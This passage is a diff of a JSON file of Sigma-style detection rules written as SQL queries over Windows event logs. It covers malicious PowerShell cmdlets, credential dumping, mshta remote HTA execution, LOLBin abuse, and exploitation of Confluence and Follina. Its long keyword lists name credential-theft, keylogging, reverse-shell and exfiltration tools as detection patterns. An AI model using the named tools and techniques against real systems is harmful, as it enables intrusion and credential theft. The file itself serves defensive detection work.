"attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Lockless%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MITM6%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PortScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PSInject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RunAs%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SCShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Sharp%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StandIn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tater%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Whisker%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WireTap%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR ScriptBlockText LIKE '%MailRaider%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-HoneyHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-InMemoryModule%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Minidump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Port-Scan%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerBreach%' ESCAPE '\\' OR ScriptBlockText LIKE '%powercat %' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerUp%' ESCAPE '\\' OR ScriptBlockText LIKE '%PowerView%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-MacAttribute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-Wallpaper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Show-TargetScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-CaptureServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR ScriptBlockText LIKE '%VolumeShadowCopyTools%' ESCAPE '\\') AND NOT (((ScriptBlockText LIKE '%Get-SystemDriveInfo%' ESCAPE '\\' OR ScriptBlockText LIKE '%C:\\\\ProgramData\\\\Amazon\\\\EC2-Windows\\\\Launch\\\\Module\\\\%' ESCAPE '\\')) OR (ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates. All Rights Reserved%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '400' AND Channel = 'Windows PowerShell') AND HostApplication LIKE '%' ESCAPE '\\' AND NOT ((HostApplication LIKE 'powershell%' ESCAPE '\\' OR HostApplication LIKE 'C:\\\\WINDOWS\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe%' ESCAPE '\\') OR ContextInfo LIKE '%Citrix\\\\ConfigSync\\\\ConfigSync.ps1%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_commandlets.yml" + "filename": "posh_pc_alternate_powershell_hosts.yml" }, { - "title": "Request A Single Ticket via PowerShell", - "id": "a861d835-af37-4930-bcd6-5b178bfb54df", + "title": "Visual Studio NodejsTools PressAnyKey Arbitrary Binary Execution", + "id": "a20391f8-76fb-437b-abc0-dba2df1952c6", "status": "test", - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "author": "frack113", + "description": "Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.execution", + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use by developers as part of NodeJS development with Visual Studio Tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.IdentityModel.Tokens.KerberosRequestorSecurityToken%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Microsoft.NodejsTools.PressAnyKey.exe' ESCAPE '\\')" ], - "filename": "posh_ps_request_kerberos_ticket.yml" + "filename": "proc_creation_win_pressanykey_lolbin_execution.yml" }, { - "title": "Suspicious Get Local Groups Information - PowerShell", - "id": "fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb", + "title": "Application Whitelisting Bypass via PresentationHost.exe", + "id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "status": "experimental", - "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files. It can be abused to run malicious \".xbap\" files any bypass AWL", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "falsepositives": [ + "Legitimate \".xbap\" being executed via \"PresentationHost\"" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND CommandLine LIKE '%.xbap%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_lolbin_presentationhost.yml" + }, + { + "title": "Suspicious ConfigSecurityPolicy Execution", + "id": "1f0f6176-6482-4027-b151-00071af39d7e", + "status": "experimental", + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1069.001" + "attack.exfiltration", + "attack.t1567" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%get-localgroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LocalGroupMember%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Get-WMIObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Group%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%ConfigSecurityPolicy.exe%' ESCAPE '\\' OR Image LIKE '%\\\\ConfigSecurityPolicy.exe' ESCAPE '\\' OR OriginalFileName = 'ConfigSecurityPolicy.exe') AND (CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_local_group_reco.yml" + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml" }, { - "title": "Enumerate Credentials from Windows Credential Manager With PowerShell", - "id": "603c6630-5225-49c1-8047-26c964553e0e", + "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", + "id": "245f92e3-c4da-45f1-9070-bc552e06db11", "status": "test", - "description": "Adversaries may search for common password storage locations to obtain user credentials.\nPasswords are stored in several places on a system, depending on the operating system or application holding the credentials.\n", - "author": "frack113", + "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1555" + "attack.initial_access", + "attack.execution", + "attack.t1190", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%vaultcmd%' ESCAPE '\\' AND ScriptBlockText LIKE '%/listcreds:%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Windows Credentials%' ESCAPE '\\' OR ScriptBlockText LIKE '%Web Credentials%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" ], - "filename": "posh_ps_enumerate_password_windows_credential_manager.yml" + "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" }, { - "title": "Potential In-Memory Execution Using Reflection.Assembly", - "id": "ddcd88cb-7f62-4ce5-86f9-1704190feb0a", + "title": "Potential Arbitrary File Download Using Office Application", + "id": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", "status": "experimental", - "description": "Detects usage of \"Reflection.Assembly\" load functions to dynamically load assemblies in memory", - "author": "frack113", + "description": "Detects potential arbitrary file download using a Microsoft Office application", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], "falsepositives": [ - "Legitimate use of the library" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Reflection.Assembly]::load%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\') OR OriginalFileName IN ('Excel.exe', 'POWERPNT.EXE', 'WinWord.exe')) AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\'))" ], - "filename": "posh_ps_dotnet_assembly_from_file.yml" + "filename": "proc_creation_win_office_arbitrary_cli_download.yml" }, { - "title": "Suspicious Invoke-Item From Mount-DiskImage", - "id": "902cedee-0398-4e3a-8183-6f3a89773a96", + "title": "PUA - Adidnsdump Execution", + "id": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", "status": "test", - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", + "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1553.005" + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Mount-DiskImage %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ImagePath %' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-Volume%' ESCAPE '\\' AND ScriptBlockText LIKE '%.DriveLetter%' ESCAPE '\\' AND ScriptBlockText LIKE '%invoke-item %' ESCAPE '\\' AND ScriptBlockText LIKE '%):\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%adidnsdump%' ESCAPE '\\')" ], - "filename": "posh_ps_run_from_mount_diskimage.yml" + "filename": "proc_creation_win_python_adidnsdump.yml" }, { - "title": "Potential Invoke-Mimikatz PowerShell Script", - "id": "189e3b02-82b2-4b90-9662-411eb64486d4", + "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", + "id": "b98d0db6-511d-45de-ad02-e82a98729620", "status": "experimental", - "description": "Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "author": "Tim Rauch", + "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.defense_evasion", + "attack.execution", + "attack.t1218.005" ], "falsepositives": [ - "Mimikatz can be useful for testing the security of networks" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%DumpCreds%' ESCAPE '\\' AND ScriptBlockText LIKE '%DumpCerts%' ESCAPE '\\') OR ScriptBlockText LIKE '%sekurlsa::logonpasswords%' ESCAPE '\\' OR (ScriptBlockText LIKE '%crypto::certificates%' ESCAPE '\\' AND ScriptBlockText LIKE '%CERT\\_SYSTEM\\_STORE\\_LOCAL\\_MACHINE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "posh_ps_potential_invoke_mimikatz.yml" + "filename": "proc_creation_win_mshta_http.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ScriptBlockLogging", - "id": "fa2559c8-1197-471d-9cdd-05a0273d4522", + "title": "Suspicious MSDT Parent Process", + "id": "7a74da6b-ea76-47db-92cc-874ad90df734", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockLogging LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR ScriptBlockLogging LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" ], - "filename": "posh_ps_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_msdt_susp_parent.yml" }, { - "title": "Windows PowerShell Upload Web Request", - "id": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", - "status": "experimental", - "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", - "author": "frack113", + "title": "Renamed MegaSync Execution", + "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", + "status": "test", + "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.", + "author": "Sittikorn S", "tags": [ - "attack.exfiltration", - "attack.t1020" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate script" + "Software that illegally integrates MegaSync in a renamed form", + "Administrators that have renamed MegaSync" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\') AND ScriptBlockText LIKE '%-Method %' ESCAPE '\\' AND (ScriptBlockText LIKE '% Put %' ESCAPE '\\' OR ScriptBlockText LIKE '% Post %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'megasync.exe' AND NOT (Image LIKE '%\\\\megasync.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_upload.yml" + "filename": "proc_creation_win_renamed_megasync.yml" }, { - "title": "Change User Agents with WebRequest", - "id": "d4488827-73af-4f8d-9244-7b7662ef046e", + "title": "Suspicious Extrac32 Execution", + "id": "aa8e035d-7be4-48d3-a944-102aec04400d", "status": "experimental", - "description": "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic.\nCommands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.\n", + "description": "Download or Copy file with Extrac32", "author": "frack113", "tags": [ "attack.command_and_control", - "attack.t1071.001" + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' AND ScriptBlockText LIKE '%-UserAgent %' ESCAPE '\\')" - ], - "filename": "posh_ps_susp_invoke_webrequest_useragent.yml" - }, - { - "title": "Suspicious X509Enrollment - Ps Script", - "id": "504d63cb-0dba-4d02-8531-e72981aace2c", - "status": 